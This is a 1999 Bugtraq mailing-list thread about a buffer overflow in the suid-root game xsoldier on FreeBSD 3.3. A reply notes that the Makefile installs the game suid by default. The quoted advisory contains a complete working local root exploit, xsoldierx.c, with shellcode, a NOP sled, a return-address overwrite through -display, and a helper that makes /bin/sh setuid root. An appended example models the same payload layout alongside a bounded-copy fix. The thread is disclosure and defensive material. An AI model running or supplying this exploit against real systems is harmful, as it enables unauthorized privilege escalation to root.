[12989] in bugtraq


Xsoldier xploit (was: FreeBSD 3.3 xsoldier root exploit)

daemon@ATHENA.MIT.EDU (Spidey)
Thu Dec 16 11:57:32 1999

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id:  <14424.26197.952088.538641@anarcat.dyndns.org>
Date:         Wed, 15 Dec 1999 23:11:01 -0500
Reply-To: Spidey <beaupran@iro.umontreal.ca>
From: Spidey <beaupran@IRO.UMONTREAL.CA>
X-To:         Brock Tellier <btellier@USA.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

Just to make things clear. This is not particular to FreeBSD. This is
the xsoldier program compiled normally. In fact, in the distribution
of xsoldier, the Makefile precisely specifies that the program should
be installed suid:

install.bin::
        @if [ -d $(BINDIR) ]; then set +x; else (set -x; $(MKDIRHIER) $(BINDIR)); fi
        $(INSTALL) -c -m 4755 $(PROGRAM) $(BINDIR)/$(PROGRAM)
        @echo "install bin . done"

That is all...

--- Big Brother told Brock Tellier to write, at 17:11 of December 15:
> Greetings,
>
> OVERVIEW
> A vulnerability in FreeBSD 3.3's xsoldier will allow any user to gain root
> access.  This user does not have to have a valid $DISPLAY to exploit this.
>
> BACKGROUND
> Only FreeBSD 3.3-RELEASE has been tested.  xsoldier, suid-root by default, was
> installed as part of the X11 games packages via /stand/sysinstall.
>
> DETAILS
> More problems with FreeBSD 3.3 ports.  This time with xsoldier, a suid-root
> game.  A simple overflow in the -display option allows any user to gain root.
> Although xsoldier only runs under X, a long -display arg on the CL will allow
> us to gain root.
>
> --- xsoldierx.c ---
> /*
>  * xsoldier exploit for Freebsd-3.3-RELEASE
>  * Drops a suid root shell in /bin/sh
>  * Brock Tellier btellier@usa.net
>  */
>
> #include <stdio.h>
> #include <stdlib.h>    /* atoi(), system(), exit() */
> #include <unistd.h>    /* execl() */
>
> /* FreeBSD/i386 shellcode that execve()s /tmp/ui.  It patches its own
>  * lcall operand at run time so that the byte string contains no NUL,
>  * which matters because it travels to the target inside an argv string. */
> char shell[]= /* mudge@l0pht.com */
>   "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
>   "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
>   "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
>   "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";
>
> /* Source of the helper the shellcode runs with xsoldier's privileges:
>  * it makes /bin/sh set-uid root. */
> #define CODE "#include <sys/stat.h>\nint main(void) { chmod(\"/bin/sh\", 0004555); return 0; }\n"
>
> /* Write and compile the helper as /tmp/ui */
> void buildui(void) {
>   FILE *fp;
>   char cc[100];
>   fp = fopen("/tmp/ui.c", "w");
>   if (fp == NULL) {
>     perror("/tmp/ui.c");
>     exit(1);
>   }
>   fputs(CODE, fp);
>   fclose(fp);
>   snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
>   system(cc);
> }
>
> int main(int argc, char *argv[]) {
>   int x = 0;
>   int y = 0;
>   int offset = 0;
>   int bsize = 4400;
>   char buf[bsize];
>   unsigned int eip = 0xbfbfdb65; /* works for me */
>   buildui();
>
>   /* optional argument: offset added to the guessed return address */
>   if (argc > 1) {
>     offset = atoi(argv[1]);
>     eip = eip + offset;
>   }
>   fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE <btellier@usa.net>\n");
>   fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
>   fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
>
>   /* NOP sled: a return anywhere inside it slides into the shellcode */
>   for (x = 0; x < 4325; x++) buf[x] = 0x90;
>   fprintf(stderr, "NOPs to %d\n", x);
>
>   /* shellcode follows the sled (67 bytes) */
>   for (y = 0; y < 67; x++, y++) buf[x] = shell[y];
>   fprintf(stderr, "Shellcode to %d\n", x);
>
>   /* overwrite the saved return address, little-endian, pointing into the sled */
>   buf[x++] =  eip & 0x000000ff;
>   buf[x++] = (eip & 0x0000ff00) >> 8;
>   buf[x++] = (eip & 0x00ff0000) >> 16;
>   buf[x++] = (eip & 0xff000000) >> 24;
>   fprintf(stderr, "eip to %d\n", x);
>
>   /* terminate the argument right after the return address
>    * (buf[bsize] would be one byte past the end of buf) */
>   buf[x] = '\0';
>
>   execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, (char *)NULL);
>   perror("execl");
>   return 1;
> }
>
> -------
>
> Brock Tellier
> UNIX Systems Administrator
> Chicago, IL, USA
> btellier@usa.net
>
> ____________________________________________________________________
> Get free email and a permanent address at http://www.netaddress.com/?N=1

--
Si l'image donne l'illusion de savoir
C'est que l'adage pretend que pour croire,
L'important ne serait que de voir

Lofofora
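The layout of the argument that Brock's xsoldierx.c hand-codes, and the bounded copy that would have closed the hole, as an added example (this is neither post's code and not xsoldier's source, which is not on the page): build_payload() lays out sled, shellcode and little-endian return address the way the exploit's three loops do, payload_has_nul() checks the caveat that an argv string ends at its first zero byte, and copy_display() is a hypothetical hardened replacement for an unbounded copy of the -display value. DISPLAY_MAX, the helper names and the stand-in shellcode bytes are assumptions.

```c
/*
 * Added example, not part of the original posts.  Models the payload
 * layout of xsoldierx.c and a bounded copy of the -display value.
 * DISPLAY_MAX and the stand-in shellcode bytes are assumptions; the real
 * xsoldier buffer size is not stated on the page.
 */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

#define DISPLAY_MAX 256   /* assumed size of the target's -display buffer */

/* Lay out NOP sled + shellcode + little-endian return address, exactly as
 * the loops in xsoldierx.c do.  Returns the payload length (excluding the
 * terminating NUL), or 0 if it does not fit in out[]. */
size_t build_payload(unsigned char *out, size_t outsz,
                     size_t nops, const unsigned char *sc, size_t sclen,
                     uint32_t ret)
{
    size_t need = nops + sclen + sizeof ret + 1;   /* +1 for the NUL */
    if (need > outsz)
        return 0;
    memset(out, 0x90, nops);                        /* i386 NOP sled */
    memcpy(out + nops, sc, sclen);                  /* shellcode after the sled */
    for (size_t i = 0; i < sizeof ret; i++)         /* i386 is little-endian */
        out[nops + sclen + i] = (unsigned char)(ret >> (8 * i));
    out[need - 1] = '\0';
    return need - 1;
}

/* argv strings are C strings: a zero byte anywhere in sled, shellcode or
 * address truncates the payload before execve() hands it to the target. */
int payload_has_nul(const unsigned char *p, size_t len)
{
    return memchr(p, 0, len) != NULL;
}

/* Hardened handling of the -display value: copy into the fixed buffer only
 * if it fits, otherwise refuse.  Returns 0 on success, -1 if too long. */
int copy_display(char *dst, size_t dstsz, const char *arg)
{
    size_t n = strlen(arg);
    if (n >= dstsz)
        return -1;
    memcpy(dst, arg, n + 1);
    return 0;
}

int main(void)
{
    /* constructed stand-in shellcode bytes, NUL-free like mudge's */
    static const unsigned char sc[] = { 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68 };
    unsigned char buf[4400];
    size_t len = build_payload(buf, sizeof buf, 4325, sc, sizeof sc, 0xbfbfdb65u);
    printf("payload %zu bytes, return address at offset %zu, nul-free=%d\n",
           len, len - 4, !payload_has_nul(buf, len));

    char display[DISPLAY_MAX];
    printf("bounded copy of the payload into a %d-byte buffer: %d\n",
           DISPLAY_MAX, copy_display(display, sizeof display, (const char *)buf));
    printf("bounded copy of \":0.0\": %d\n",
           copy_display(display, sizeof display, ":0.0"));
    return 0;
}
```

With the 8-byte stand-in the return address lands at offset 4333; with mudge's 67-byte shellcode it lands at 4392, which is where the exploit's third loop writes it. The NUL check is why the guessed address 0xbfbfdb65 and the shellcode both avoid zero bytes: execl() hands the target a C string, so a zero byte ends the argument early and the overwrite never reaches the saved return address. On the defensive side a bounded copy only fixes this one buffer; a set-uid game should also drop to the real uid with setuid(getuid()) before it touches argv, and, as Spidey notes, it is the Makefile's -m 4755 that turns an ordinary overflow in a game into root.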
